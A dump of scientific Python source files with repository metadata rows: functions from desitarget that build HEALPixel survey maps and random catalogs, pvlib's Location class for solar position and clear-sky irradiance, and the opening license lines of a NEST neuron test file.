# ADM also restrict to appropriate maskbits values, if passed.
if maskbits is not None:
mb = randoms["MASKBITS"]
ii &= (mb & maskbits) == 0
# ADM the counts in each HEALPixel in the survey.
if np.sum(ii) > 0:
pixnums = hp.ang2pix(nside, np.radians(90.-decs[ii]),
np.radians(ras[ii]), nest=True)
pixnum, pixcnt = np.unique(pixnums, return_counts=True)
else:
msg = "zero area based on randoms with passed constraints"
log.error(msg)
raise ValueError
# ADM whole-sky-counts to retain zeros for zero survey coverage.
npix = hp.nside2npix(nside)
pix_cnt = np.bincount(pixnum, weights=pixcnt, minlength=npix)
# ADM expected area based on the HEALPixels at this nside.
expected_cnt = hp.nside2pixarea(nside, degrees=True)*density
# ADM weight map based on (actual counts)/(expected counts).
pix_weight = pix_cnt/expected_cnt
# ADM if requested, print the total area of the survey to screen.
if outarea:
area = np.sum(pix_weight*hp.nside2pixarea(nside, degrees=True))
if maskbits is None:
log.info('Area of survey with NOBS > {} in [g,r,z] = {:.2f} sq. deg.'
.format(nobsgrz, area))
else:
log.info(
'Area, NOBS > {} in [g,r,z], maskbits of {} = {:.2f} sq. deg.'
.format(nobsgrz, maskbits, area))
log.info('Done...t = {:.1f}s'.format(time()-start))
return pix_weight
def stellar_density(nside=256):
"""Make a HEALPixel map of stellar density based on Gaia.
Parameters
----------
nside : :class:`int`, optional, defaults to nside=256 (~0.0525 sq. deg. or "brick-sized")
The resolution (HEALPixel NESTED nside number) at which to build the map.
Notes
-----
- The environment variable $GAIA_DIR must be set.
"""
# ADM check that the GAIA_DIR is set and retrieve it.
gaiadir = get_gaia_dir()
hpdir = os.path.join(gaiadir, 'healpix')
# ADM the number of pixels and the pixel area at nside.
npix = hp.nside2npix(nside)
pixarea = hp.nside2pixarea(nside, degrees=True)
# ADM an output array of all possible HEALPixels at nside.
pixout = np.zeros(npix, dtype='int32')
# ADM find all of the Gaia files.
filenames = glob(os.path.join(hpdir, '*fits'))
# ADM read in each file, restricting to the criteria for point
# ADM sources and storing in a HEALPixel map at resolution nside.
nfiles = len(filenames)
t0 = time()
for nfile, filename in enumerate(filenames):
if nfile % 1000 == 0 and nfile > 0:
elapsed = time() - t0
rate = nfile / elapsed
log.info('{}/{} files; {:.1f} files/sec; {:.1f} total mins elapsed'
.format(nfile, nfiles, rate, elapsed/60.))
# ADM save memory, speed up by only reading a subset of columns.
gobjs = fitsio.read(
filename,
columns=['RA', 'DEC', 'PHOT_G_MEAN_MAG', 'ASTROMETRIC_EXCESS_NOISE']
)
# ADM restrict to subset of point sources.
ra, dec = gobjs["RA"], gobjs["DEC"]
gmag = gobjs["PHOT_G_MEAN_MAG"]
excess = gobjs["ASTROMETRIC_EXCESS_NOISE"]
point = (excess == 0.) | (np.log10(excess) < 0.3*gmag-5.3)
grange = (gmag >= 12) & (gmag < 17)
w = np.where(point & grange)
# ADM calculate the HEALPixels for the point sources.
theta, phi = np.radians(90-dec[w]), np.radians(ra[w])
pixnums = hp.ang2pix(nside, theta, phi, nest=True)
# ADM return the counts in each pixel number...
pixnum, pixcnt = np.unique(pixnums, return_counts=True)
# ADM...and populate the output array with the counts.
pixout[pixnum] += pixcnt
# ADM return the density
return pixout/pixarea
def get_targ_dens(targets, Mx, nside=256):
"""The density of targets in HEALPixels.
Parameters
----------
targets : :class:`~numpy.ndarray` or `str`
A corresponding (same Legacy Surveys Data Release) target catalog as made by,
e.g., :func:`desitarget.cuts.select_targets()`, or the name of such a file.
Mx : :class:`list` or `~numpy.array`
The targeting bitmasks associated with the passed targets, assumed to be
a desi, bgs and mws mask in that order (for either SV or the main survey).
nside : :class:`int`, optional, defaults to nside=256 (~0.0525 sq. deg. or "brick-sized")
The resolution (HEALPixel nside number) at which to build the map (NESTED scheme).
Returns
-------
:class:`~numpy.ndarray`
An array of target densities with one column for every bit returned by
:func:`desitarget.QA._load_targdens()`. The array contains the density of
those targets in pixels at the passed `nside`
"""
# ADM if a file name was passed for the targets catalog, read it in
if isinstance(targets, str):
log.info('Reading in target catalog...t = {:.1f}s'.format(time()-start))
targets = fitsio.read(targets)
# ADM retrieve the bitmasks.
if Mx[0]._name == 'cmx_mask':
msg = 'generating target densities does NOT work for CMX files!!!'
log.critical(msg)
raise ValueError(msg)
else:
desi_mask, bgs_mask, mws_mask = Mx
# ADM the number of pixels and the pixel area at the passed nside
npix = hp.nside2npix(nside)
pixarea = hp.nside2pixarea(nside, degrees=True)
# ADM retrieve the pixel numbers for every target RA/Dec
ras, decs = targets["RA"], targets["DEC"]
pixnums = hp.ang2pix(nside, np.radians(90.-decs), np.radians(ras), nest=True)
# ADM retrieve the bit names of interest
from desitarget.QA import _load_targdens
bitnames = np.array(list(_load_targdens(bit_mask=Mx).keys()))
# ADM and set up an array to hold the output target densities
targdens = np.zeros(npix, dtype=[(bitname, 'f4') for bitname in bitnames])
for bitname in bitnames:
if 'ALL' in bitname:
ii = np.ones(len(targets)).astype('bool')
else:
if ('BGS' in bitname) and not('S_ANY' in bitname):
ii = targets["BGS_TARGET"] & bgs_mask[bitname] != 0
elif (('MWS' in bitname or 'BACKUP' in bitname or
'GAIA_STD' in bitname) and not('S_ANY' in bitname)):
ii = targets["MWS_TARGET"] & mws_mask[bitname] != 0
else:
ii = targets["DESI_TARGET"] & desi_mask[bitname] != 0
if np.any(ii):
# ADM calculate the number of objects in each pixel for the
# ADM targets of interest
pixnum, pixcnt = np.unique(pixnums[ii], return_counts=True)
targdens[bitname][pixnum] = pixcnt/pixarea
return targdens
def pixmap(randoms, targets, rand_density, nside=256, gaialoc=None):
"""HEALPix map of useful quantities for a Legacy Surveys Data Release
Parameters
----------
randoms : :class:`~numpy.ndarray` or `str`
Catalog or file of randoms as made by :func:`select_randoms()` or
:func:`quantities_at_positions_in_a_brick()`. Must contain the
columns 'RA', 'DEC', 'EBV', 'PSFDEPTH_W1/W2/G/R/Z', 'NOBS_G/R/Z'
'GALDEPTH_G/R/Z', 'PSFSIZE_G/R/Z', 'MASKBITS'.
targets : :class:`~numpy.ndarray` or `str`
Corresponding (i.e. same Data Release) catalog or file of targets
as made by, e.g., :func:`desitarget.cuts.select_targets()`, or
the the name of a directory containing HEALPix-split targets that
can be read by :func:`desitarget.io.read_targets_in_box()`.
rand_density : :class:`int`
Number of random points per sq. deg. at which the random catalog
was generated (see also :func:`select_randoms()`).
nside : :class:`int`, optional, defaults to nside=256
Resolution (HEALPix nside) at which to build the (NESTED) map.
The default corresponds to ~0.0525 sq. deg. (or "brick-sized")
gaialoc : :class:`str`, optional, defaults to ``None``
Name of a FITS file that already contains a column "STARDENS",
which is simply read in. If ``None``, the stellar density is
constructed from files in $GAIA_DIR.
Returns
-------
:class:`~numpy.ndarray`
An array of useful information that includes
- HPXPIXEL: HEALPixel integers at the passed `nside`.
- FRACAREA: Fraction of pixel with at least one observation
in any band. Made with :func:`pixweight()`.
- STARDENS: The stellar density in a pixel from Gaia. Made
with :func:`stellar_density()`.
- EBV: E(B-V) in pixel from the SFD dust map, from the
median of EBV values in the passed `randoms`.
- PSFDEPTH_G, R, Z: PSF depth in the pixel, from the median
of PSFDEPTH values in `randoms`.
- GALDEPTH_G, R, Z: Galaxy depth in the pixel, from the
median of GALDEPTH values in `randoms`.
- PSFDEPTH_W1, W2: (AB PSF) depth in the pixel, from the
median of values in the passed `randoms`.
- PSFSIZE_G, R, Z: Weighted average PSF FWHM, in arcsec, in
the pixel, from the median of PSFSIZE
values in the passed random catalog.
- FRACAREA_X: Fraction of pixel with at least one observation
in any band with MASKBITS==X (bitwise OR, so,
e.g. if X=7 then fraction for 2^0 | 2^1 | 2^2).
- One column for every bit that is returned by
:func:`desitarget.QA._load_targdens()`. Each column
contains the target density in the pixel.
:class:`str`
Survey to which `targets` corresponds, e.g., 'main', 'svX', etc.
Notes
-----
- If `gaialoc` is ``None`` then $GAIA_DIR must be set.
"""
# ADM if a file name was passed for the random catalog, read it in
if isinstance(randoms, str):
log.info('Reading in random catalog...t = {:.1f}s'.format(time()-start))
randoms = fitsio.read(randoms)
# ADM if a file name was passed for the targets catalog, read it in
if isinstance(targets, str):
log.info('Reading in target catalog...t = {:.1f}s'.format(time()-start))
# ADM grab appropriate columns for an SV/cmx/main survey file.
targcols = target_columns_from_header(targets)
cols = np.concatenate([["RA", "DEC"], targcols])
targets = read_targets_in_box(targets, columns=cols)
log.info('Read targets and randoms...t = {:.1f}s'.format(time()-start))
# ADM change target column names, and retrieve associated survey information.
_, Mx, survey, targets = main_cmx_or_sv(targets, rename=True)
# ADM determine the areal coverage of the randoms at this nside.
log.info('Determining footprint...t = {:.1f}s'.format(time()-start))
pw = pixweight(randoms, rand_density, nside=nside)
npix = len(pw)
# ADM areal coverage for some combinations of MASKBITS.
mbcomb = []
mbstore = []
for mb in [get_imaging_maskbits(get_default_maskbits()),
get_imaging_maskbits(get_default_maskbits(bgs=True))]:
bitint = np.sum(2**np.array(mb))
mbcomb.append(bitint)
log.info('Determining footprint for maskbits not in {}...t = {:.1f}s'
.format(bitint, time()-start))
mbstore.append(pixweight(randoms, rand_density,
nside=nside, maskbits=bitint))
log.info('Determining footprint...t = {:.1f}s'.format(time()-start))
pw = pixweight(randoms, rand_density, nside=nside)
npix = len(pw)
# ADM get the target densities.
log.info('Calculating target densities...t = {:.1f}s'.format(time()-start))
targdens = get_targ_dens(targets, Mx, nside=nside)
# ADM set up the output array.
datamodel = [('HPXPIXEL', '>i4'), ('FRACAREA', '>f4'), ('STARDENS', '>f4'), ('EBV', '>f4'),
('PSFDEPTH_G', '>f4'), ('PSFDEPTH_R', '>f4'), ('PSFDEPTH_Z', '>f4'),
('GALDEPTH_G', '>f4'), ('GALDEPTH_R', '>f4'), ('GALDEPTH_Z', '>f4'),
('PSFDEPTH_W1', '>f4'), ('PSFDEPTH_W2', '>f4'),
('PSFSIZE_G', '>f4'), ('PSFSIZE_R', '>f4'), ('PSFSIZE_Z', '>f4')]
# ADM the maskbits-dependent areas.
datamodel += [("FRACAREA_{}".format(bitint), '>f4') for bitint in mbcomb]
# ADM the density of each target class.
datamodel += targdens.dtype.descr
hpxinfo = np.zeros(npix, dtype=datamodel)
# ADM set initial values to -1 so that they can easily be clipped.
hpxinfo[...] = -1
# ADM add the areal coverage, pixel information and target densities.
hpxinfo['HPXPIXEL'] = np.arange(npix)
hpxinfo['FRACAREA'] = pw
for bitint, fracarea in zip(mbcomb, mbstore):
hpxinfo['FRACAREA_{}'.format(bitint)] = fracarea
for col in targdens.dtype.names:
hpxinfo[col] = targdens[col]
# ADM build the stellar density, or if gaialoc was passed as a file, just read it in.
if gaialoc is None:
log.info('Calculating stellar density using Gaia files in $GAIA_DIR...t = {:.1f}s'
.format(time()-start))
sd = stellar_density(nside=nside)
else:
sd = fitsio.read(gaialoc, columns=["STARDENS"])
if len(sd) != len(hpxinfo):
log.critical('Stellar density map in {} was not calculated at NSIDE={}'
.format(gaialoc, nside))
hpxinfo["STARDENS"] = sd
# ADM add the median values of all of the other systematics.
log.info('Calculating medians of systematics from random catalog...t = {:.1f}s'
.format(time()-start))
ras, decs = randoms["RA"], randoms["DEC"]
pixnums = hp.ang2pix(nside, np.radians(90.-decs), np.radians(ras), nest=True)
# ADM some sorting to order the values to extract the medians.
pixorder = np.argsort(pixnums)
pixels, pixcnts = np.unique(pixnums, return_counts=True)
pixcnts = np.insert(pixcnts, 0, 0)
pixcnts = np.cumsum(pixcnts)
log.info('Done sorting...t = {:.1f}s'.format(time()-start))
# ADM work through the ordered pixels to populate the median for
# ADM each quantity of interest.
cols = ['EBV', 'PSFDEPTH_W1', 'PSFDEPTH_W2',
'PSFDEPTH_G', 'GALDEPTH_G', 'PSFSIZE_G',
'PSFDEPTH_R', 'GALDEPTH_R', 'PSFSIZE_R',
'PSFDEPTH_Z', 'GALDEPTH_Z', 'PSFSIZE_Z']
t0 = time()
npix = len(pixcnts)
stepper = npix//50
for i in range(npix-1):
inds = pixorder[pixcnts[i]:pixcnts[i+1]]
pix = pixnums[inds][0]
for col in cols:
hpxinfo[col][pix] = np.median(randoms[col][inds])
if i % stepper == 0 and i > 0:
elapsed = time() - t0
rate = i / elapsed
log.info('{}/{} pixels; {:.1f} pix/sec; {:.1f} total mins elapsed'
.format(i, npix, rate, elapsed/60.))
log.info('Done...t = {:.1f}s'.format(time()-start))
return hpxinfo, survey
def select_randoms_bricks(brickdict, bricknames, numproc=32, drdir=None,
zeros=False, nomtl=True, cnts=True, density=None,
dustdir=None, aprad=None, seed=1):
"""Parallel-process a random catalog for a set of brick names.
Parameters
----------
brickdict : :class:`dict`
Look-up dictionary for a set of bricks, as made by, e.g.
:func:`~desitarget.skyfibers.get_brick_info`.
bricknames : :class:`~numpy.array`
The names of the bricks in `brickdict` to process.
drdir : :class:`str`, optional, defaults to None
See :func:`~desitarget.randoms.get_quantities_in_a_brick`.
zeros : :class:`bool`, optional, defaults to ``False``
See :func:`~desitarget.randoms.get_quantities_in_a_brick`.
nomtl : :class:`bool`, optional, defaults to ``True``
If ``True`` then do NOT add MTL quantities to the output array.
cnts : :class:`bool`, optional, defaults to ``True``
See :func:`~desitarget.skyfibers.get_brick_info`.
seed : :class:`int`, optional, defaults to 1
See :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the same columns as returned by
:func:`~desitarget.randoms.get_quantities_in_a_brick`. If
`zeros` and `nomtl` are both ``False`` additional columns are
returned, as added by :func:`~desitarget.targets.finalize`.
Notes
-----
- See :func:`~desitarget.randoms.select_randoms` for definitions of
`numproc`, `density`, `dustdir`, `aprad`.
"""
nbricks = len(bricknames)
log.info('Run {} bricks from {} at density {:.1e} per sq. deg...t = {:.1f}s'
.format(nbricks, drdir, density, time()-start))
# ADM the critical function to run on every brick.
def _get_quantities(brickname):
"""wrapper on get_quantities_in_a_brick() given a brick name"""
# ADM retrieve the edges for the brick that we're working on.
if cnts:
bra, bdec, bramin, bramax, bdecmin, bdecmax, _ = brickdict[brickname]
else:
bra, bdec, bramin, bramax, bdecmin, bdecmax = brickdict[brickname]
# ADM populate the brick with random points, and retrieve the quantities
# ADM of interest at those points.
randoms = get_quantities_in_a_brick(
bramin, bramax, bdecmin, bdecmax, brickname, drdir=drdir,
density=density, dustdir=dustdir, aprad=aprad, zeros=zeros,
seed=seed)
if zeros or nomtl:
return randoms
return finalize_randoms(randoms)
# ADM this is just to count bricks in _update_status.
nbrick = np.zeros((), dtype='i8')
t0 = time()
# ADM write a total of 25 output messages during processing.
interval = nbricks // 25
def _update_status(result):
''' wrapper function for the critical reduction operation,
that occurs on the main parallel process '''
if nbrick % interval == 0 and nbrick > 0:
elapsed = time() - t0
rate = nbrick / elapsed
log.info('{}/{} bricks; {:.1f} bricks/sec; {:.1f} total mins elapsed'
.format(nbrick, nbricks, rate, elapsed/60.))
# ADM if we're going to exceed 4 hours, warn the user.
if nbricks/rate > 4*3600.:
msg = 'May take > 4 hours to run. May fail on interactive nodes.'
log.warning(msg)
nbrick[...] += 1 # this is an in-place modification.
return result
# - Parallel process input files.
if numproc > 1:
pool = sharedmem.MapReduce(np=numproc)
with pool:
qinfo = pool.map(_get_quantities, bricknames, reduce=_update_status)
else:
qinfo = list()
for brickname in bricknames:
qinfo.append(_update_status(_get_quantities(brickname)))
qinfo = np.concatenate(qinfo)
return qinfo
def supplement_randoms(donebns, density=10000, numproc=32, dustdir=None,
seed=1):
"""Random catalogs of "zeros" for missing bricks.
Parameters
----------
donebns : :class:`~numpy.ndarray`
Names of bricks that have been "completed". Bricks NOT in
`donebns` will be returned without any pixel-level quantities.
Need not be a unique set (bricks can be repeated in `donebns`).
density : :class:`int`, optional, defaults to 10,000
Number of random points per sq. deg. A typical brick is ~0.25 x
0.25 sq. deg. so ~(0.0625*density) points will be returned.
seed : :class:`int`, optional, defaults to 1
See :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
A seed of 615 + `seed` is also used to shuffle randoms across
brick boundaries.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the same columns returned by
:func:`~desitarget.randoms.get_quantities_in_a_brick`
when that function is passed zeros=True.
Notes
-----
- See :func:`~desitarget.randoms.select_randoms` for definitions of
`numproc`, `dustdir`.
"""
# ADM find the missing bricks.
brickdict = get_brick_info(None, allbricks=True)
allbns = np.array(list(brickdict.keys()), dtype=donebns.dtype)
bricknames = np.array(list(set(allbns) - set(donebns)), dtype='U')
brickdict = {bn: brickdict[bn] for bn in bricknames}
qzeros = select_randoms_bricks(brickdict, bricknames, numproc=numproc,
zeros=True, cnts=False, density=density,
dustdir=dustdir, seed=seed)
# ADM one last shuffle to randomize across brick boundaries.
np.random.seed(615+seed)
np.random.shuffle(qzeros)
return qzeros
def select_randoms(drdir, density=100000, numproc=32, nside=None, pixlist=None,
bundlebricks=None, nchunks=10, brickspersec=2.5, extra=None,
nomtl=True, dustdir=None, aprad=0.75, seed=1):
"""NOBS, DEPTHs (per-band), MASKs for random points in a Legacy Surveys DR.
Parameters
----------
drdir : :class:`str`
Root directory for a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
density : :class:`int`, optional, defaults to 100,000
Number of random points to return per sq. deg. As a brick is
~0.25 x 0.25 sq. deg. ~0.0625*density points will be returned.
numproc : :class:`int`, optional, defaults to 32
The number of processes over which to parallelize.
nside : :class:`int`, optional, defaults to `None`
(NESTED) HEALPixel nside to be used with the `pixlist` and
`bundlebricks` input.
pixlist : :class:`list` or `int`, optional, defaults to ``None``
Bricks will only be processed if the brick CENTER is within the
HEALpixels in this list, at the input `nside`. Uses the HEALPix
NESTED scheme. Useful for parallelizing. If pixlist is ``None``
then all bricks in the input `survey` will be processed.
bundlebricks : :class:`int`, defaults to ``None``
If not ``None``, then instead of selecting randoms, print a slurm
script to balance the bricks at `bundlebricks` bricks per node.
nchunks : :class:`int`, optional, defaults to 10
Number of smaller catalogs to split the random catalog into
inside the `bundlebricks` slurm script.
brickspersec : :class:`float`, optional, defaults to 2.5
The rough number of bricks processed per second (parallelized
across a chosen number of nodes). Used with `bundlebricks` to
estimate time to completion when parallelizing across pixels.
extra : :class:`str`, optional
Extra command line flags to be passed to the executable lines in
the output slurm script. Used in conjunction with `bundlefiles`.
nomtl : :class:`bool`, optional, defaults to ``True``
If ``True`` then do NOT add MTL quantities to the output array.
dustdir : :class:`str`, optional, defaults to $DUST_DIR+'maps'
The root directory pointing to SFD dust maps. If None the code
will try to use $DUST_DIR+'maps') before failing.
aprad : :class:`float`, optional, defaults to 0.75
Radii in arcsec of aperture for which to derive sky/fiber fluxes.
Defaults to the DESI fiber radius. If aprad < 1e-8 is passed,
the code to produce these values is skipped, as a speed-up, and
`apflux_` output values are set to zero.
seed : :class:`int`, optional, defaults to 1
Random seed to use when shuffling across brick boundaries.
The actual np.random.seed defaults to 615+`seed`. See also use
in :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the same columns as returned by
:func:`~desitarget.randoms.get_quantities_in_a_brick` that
includes all of the randoms resolved by the north/south divide.
:class:`~numpy.ndarray`
as above but just for randoms in northern bricks.
:class:`~numpy.ndarray`
as above but just for randoms in southern bricks.
"""
# ADM grab brick information for this data release. Depending on whether this
# ADM is pre-or-post-DR8 we need to find the correct directory or directories.
drdirs = pre_or_post_dr8(drdir)
brickdict = get_brick_info(drdirs, counts=True)
# ADM this is just the UNIQUE brick names across all surveys.
bricknames = np.array(list(brickdict.keys()))
# ADM if the pixlist or bundlebricks option was sent, we'll need the HEALPixel
# ADM information for each brick.
if pixlist is not None or bundlebricks is not None:
bra, bdec, _, _, _, _, cnts = np.vstack(list(brickdict.values())).T
theta, phi = np.radians(90-bdec), np.radians(bra)
pixnum = hp.ang2pix(nside, theta, phi, nest=True)
# ADM if the bundlebricks option was sent, call the packing code.
if bundlebricks is not None:
# ADM pixnum only contains unique bricks, need to add duplicates.
allpixnum = np.concatenate([np.zeros(cnt, dtype=int)+pix for
cnt, pix in zip(cnts.astype(int), pixnum)])
bundle_bricks(allpixnum, bundlebricks, nside, gather=True, seed=seed,
brickspersec=brickspersec, prefix='randoms',
surveydirs=[drdir], extra=extra, nchunks=nchunks)
# ADM because the broader function returns three outputs.
return None, None, None
# ADM restrict to only bricks in a set of HEALPixels, if requested.
if pixlist is not None:
# ADM if an integer was passed, turn it into a list.
if isinstance(pixlist, int):
pixlist = [pixlist]
ii = [pix in pixlist for pix in pixnum]
bricknames = bricknames[ii]
if len(bricknames) == 0:
log.warning('ZERO bricks in passed pixel list!!!')
log.info("Processing bricks in (nside={}, pixel numbers={}) HEALPixels"
.format(nside, pixlist))
# ADM a little more information if we're slurming across nodes.
if os.getenv('SLURMD_NODENAME') is not None:
log.info('Running on Node {}'.format(os.getenv('SLURMD_NODENAME')))
# ADM recover the pixel-level quantities in the DR bricks.
randoms = select_randoms_bricks(brickdict, bricknames, numproc=numproc,
drdir=drdir, density=density, nomtl=nomtl,
dustdir=dustdir, aprad=aprad, seed=seed)
# ADM add columns that are added by MTL.
if nomtl is False:
randoms = add_default_mtl(randoms, seed)
# ADM one last shuffle to randomize across brick boundaries.
np.random.seed(615+seed)
np.random.shuffle(randoms)
# ADM remove bricks that overlap between two surveys.
randomsres = resolve(randoms)
# ADM a flag for which targets are from the 'N' photometry.
from desitarget.cuts import _isonnorthphotsys
isn = _isonnorthphotsys(randoms["PHOTSYS"])
return randomsres, randoms[isn], randoms[~isn]
|
desihub/desitarget
|
py/desitarget/randoms.py
|
Python
|
bsd-3-clause
| 67,844
|
[
"Galaxy"
] |
faec90c2b2ede025827538a844c6ff2019102f9bac989d5e9a84d5d61cbb7464
|
"""
This module contains the Location class.
"""
# Will Holmgren, University of Arizona, 2014-2016.
import datetime
import pandas as pd
import pytz
from pvlib import solarposition, clearsky, atmosphere, irradiance
class Location(object):
"""
Location objects are convenient containers for latitude, longitude,
timezone, and altitude data associated with a particular
geographic location. You can also assign a name to a location object.
Location objects have two timezone attributes:
* ``tz`` is a IANA timezone string.
* ``pytz`` is a pytz timezone object.
Location objects support the print method.
Parameters
----------
latitude : float.
Positive is north of the equator.
Use decimal degrees notation.
longitude : float.
Positive is east of the prime meridian.
Use decimal degrees notation.
tz : str, int, float, or pytz.timezone, default 'UTC'.
See
http://en.wikipedia.org/wiki/List_of_tz_database_time_zones
for a list of valid time zones.
pytz.timezone objects will be converted to strings.
ints and floats must be in hours from UTC.
altitude : float, default 0.
Altitude from sea level in meters.
name : None or string, default None.
Sets the name attribute of the Location object.
**kwargs
Arbitrary keyword arguments.
Included for compatibility, but not used.
See also
--------
pvsystem.PVSystem
"""
def __init__(self, latitude, longitude, tz='UTC', altitude=0,
name=None, **kwargs):
self.latitude = latitude
self.longitude = longitude
if isinstance(tz, str):
self.tz = tz
self.pytz = pytz.timezone(tz)
elif isinstance(tz, datetime.timezone):
self.tz = 'UTC'
self.pytz = pytz.UTC
elif isinstance(tz, datetime.tzinfo):
self.tz = tz.zone
self.pytz = tz
elif isinstance(tz, (int, float)):
self.tz = tz
self.pytz = pytz.FixedOffset(tz*60)
else:
raise TypeError('Invalid tz specification')
self.altitude = altitude
self.name = name
def __repr__(self):
attrs = ['name', 'latitude', 'longitude', 'altitude', 'tz']
return ('Location: \n ' + '\n '.join(
('{}: {}'.format(attr, getattr(self, attr)) for attr in attrs)))
@classmethod
def from_tmy(cls, tmy_metadata, tmy_data=None, **kwargs):
"""
Create an object based on a metadata
dictionary from tmy2 or tmy3 data readers.
Parameters
----------
tmy_metadata : dict
Returned from tmy.readtmy2 or tmy.readtmy3
tmy_data : None or DataFrame, default None
Optionally attach the TMY data to this object.
Returns
-------
Location
"""
# not complete, but hopefully you get the idea.
# might need code to handle the difference between tmy2 and tmy3
# determine if we're dealing with TMY2 or TMY3 data
tmy2 = tmy_metadata.get('City', False)
latitude = tmy_metadata['latitude']
longitude = tmy_metadata['longitude']
if tmy2:
name = tmy_metadata['City']
else:
name = tmy_metadata['Name']
tz = tmy_metadata['TZ']
altitude = tmy_metadata['altitude']
new_object = cls(latitude, longitude, tz=tz, altitude=altitude,
name=name, **kwargs)
# not sure if this should be assigned regardless of input.
if tmy_data is not None:
new_object.tmy_data = tmy_data
new_object.weather = tmy_data
return new_object
@classmethod
def from_epw(cls, metadata, data=None, **kwargs):
"""
Create a Location object based on a metadata
dictionary from epw data readers.
Parameters
----------
metadata : dict
Returned from epw.read_epw
data : None or DataFrame, default None
Optionally attach the epw data to this object.
Returns
-------
Location object (or the child class of Location that you
called this method from).
"""
latitude = metadata['latitude']
longitude = metadata['longitude']
name = metadata['city']
tz = metadata['TZ']
altitude = metadata['altitude']
new_object = cls(latitude, longitude, tz=tz, altitude=altitude,
name=name, **kwargs)
if data is not None:
new_object.weather = data
return new_object
def get_solarposition(self, times, pressure=None, temperature=12,
**kwargs):
"""
Uses the :py:func:`solarposition.get_solarposition` function
to calculate the solar zenith, azimuth, etc. at this location.
Parameters
----------
times : pandas.DatetimeIndex
Must be localized or UTC will be assumed.
pressure : None, float, or array-like, default None
If None, pressure will be calculated using
:py:func:`atmosphere.alt2pres` and ``self.altitude``.
temperature : None, float, or array-like, default 12
kwargs
passed to :py:func:`solarposition.get_solarposition`
Returns
-------
solar_position : DataFrame
Columns depend on the ``method`` kwarg, but always include
``zenith`` and ``azimuth``.
"""
if pressure is None:
pressure = atmosphere.alt2pres(self.altitude)
return solarposition.get_solarposition(times, latitude=self.latitude,
longitude=self.longitude,
altitude=self.altitude,
pressure=pressure,
temperature=temperature,
**kwargs)
def get_clearsky(self, times, model='ineichen', solar_position=None,
dni_extra=None, **kwargs):
"""
Calculate the clear sky estimates of GHI, DNI, and/or DHI
at this location.
Parameters
----------
times: DatetimeIndex
model: str, default 'ineichen'
The clear sky model to use. Must be one of
'ineichen', 'haurwitz', 'simplified_solis'.
solar_position : None or DataFrame, default None
DataFrame with columns 'apparent_zenith', 'zenith',
'apparent_elevation'.
dni_extra: None or numeric, default None
If None, will be calculated from times.
kwargs
Extra parameters passed to the relevant functions. Climatological
values are assumed in many cases. See source code for details!
Returns
-------
clearsky : DataFrame
Column names are: ``ghi, dni, dhi``.
"""
if dni_extra is None:
dni_extra = irradiance.get_extra_radiation(times)
try:
pressure = kwargs.pop('pressure')
except KeyError:
pressure = atmosphere.alt2pres(self.altitude)
if solar_position is None:
solar_position = self.get_solarposition(times, pressure=pressure,
**kwargs)
apparent_zenith = solar_position['apparent_zenith']
apparent_elevation = solar_position['apparent_elevation']
if model == 'ineichen':
try:
linke_turbidity = kwargs.pop('linke_turbidity')
except KeyError:
interp_turbidity = kwargs.pop('interp_turbidity', True)
linke_turbidity = clearsky.lookup_linke_turbidity(
times, self.latitude, self.longitude,
interp_turbidity=interp_turbidity)
try:
airmass_absolute = kwargs.pop('airmass_absolute')
except KeyError:
airmass_absolute = self.get_airmass(
times, solar_position=solar_position)['airmass_absolute']
cs = clearsky.ineichen(apparent_zenith, airmass_absolute,
linke_turbidity, altitude=self.altitude,
dni_extra=dni_extra, **kwargs)
elif model == 'haurwitz':
cs = clearsky.haurwitz(apparent_zenith)
elif model == 'simplified_solis':
cs = clearsky.simplified_solis(
apparent_elevation, pressure=pressure, dni_extra=dni_extra,
**kwargs)
else:
raise ValueError('{} is not a valid clear sky model. Must be '
'one of ineichen, simplified_solis, haurwitz'
.format(model))
return cs
def get_airmass(self, times=None, solar_position=None,
model='kastenyoung1989'):
"""
Calculate the relative and absolute airmass.
Automatically chooses zenith or apparant zenith
depending on the selected model.
Parameters
----------
times : None or DatetimeIndex, default None
Only used if solar_position is not provided.
solar_position : None or DataFrame, default None
DataFrame with with columns 'apparent_zenith', 'zenith'.
model : str, default 'kastenyoung1989'
Relative airmass model
Returns
-------
airmass : DataFrame
Columns are 'airmass_relative', 'airmass_absolute'
"""
if solar_position is None:
solar_position = self.get_solarposition(times)
if model in atmosphere.APPARENT_ZENITH_MODELS:
zenith = solar_position['apparent_zenith']
elif model in atmosphere.TRUE_ZENITH_MODELS:
zenith = solar_position['zenith']
else:
raise ValueError('{} is not a valid airmass model'.format(model))
airmass_relative = atmosphere.get_relative_airmass(zenith, model)
pressure = atmosphere.alt2pres(self.altitude)
airmass_absolute = atmosphere.get_absolute_airmass(airmass_relative,
pressure)
airmass = pd.DataFrame(index=solar_position.index)
airmass['airmass_relative'] = airmass_relative
airmass['airmass_absolute'] = airmass_absolute
return airmass
def get_sun_rise_set_transit(self, times, method='pyephem', **kwargs):
"""
Calculate sunrise, sunset and transit times.
Parameters
----------
times : DatetimeIndex
Must be localized to the Location
method : str, default 'pyephem'
'pyephem', 'spa', or 'geometric'
kwargs are passed to the relevant functions. See
solarposition.sun_rise_set_transit_<method> for details.
Returns
-------
result : DataFrame
Column names are: ``sunrise, sunset, transit``.
"""
if method == 'pyephem':
result = solarposition.sun_rise_set_transit_ephem(
times, self.latitude, self.longitude, **kwargs)
elif method == 'spa':
result = solarposition.sun_rise_set_transit_spa(
times, self.latitude, self.longitude, **kwargs)
elif method == 'geometric':
sr, ss, tr = solarposition.sun_rise_set_transit_geometric(
times, self.latitude, self.longitude, **kwargs)
result = pd.DataFrame(index=times,
data={'sunrise': sr,
'sunset': ss,
'transit': tr})
else:
raise ValueError('{} is not a valid method. Must be '
'one of pyephem, spa, geometric'
.format(method))
return result
|
anomam/pvlib-python
|
pvlib/location.py
|
Python
|
bsd-3-clause
| 12,154
|
[
"EPW"
] |
d39392b57291b1f27aa488ebfc8467e38dccbda98a9d96639c6905adedfd1d56
|
# -*- coding: utf-8 -*-
#
# test_erfc_neuron.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
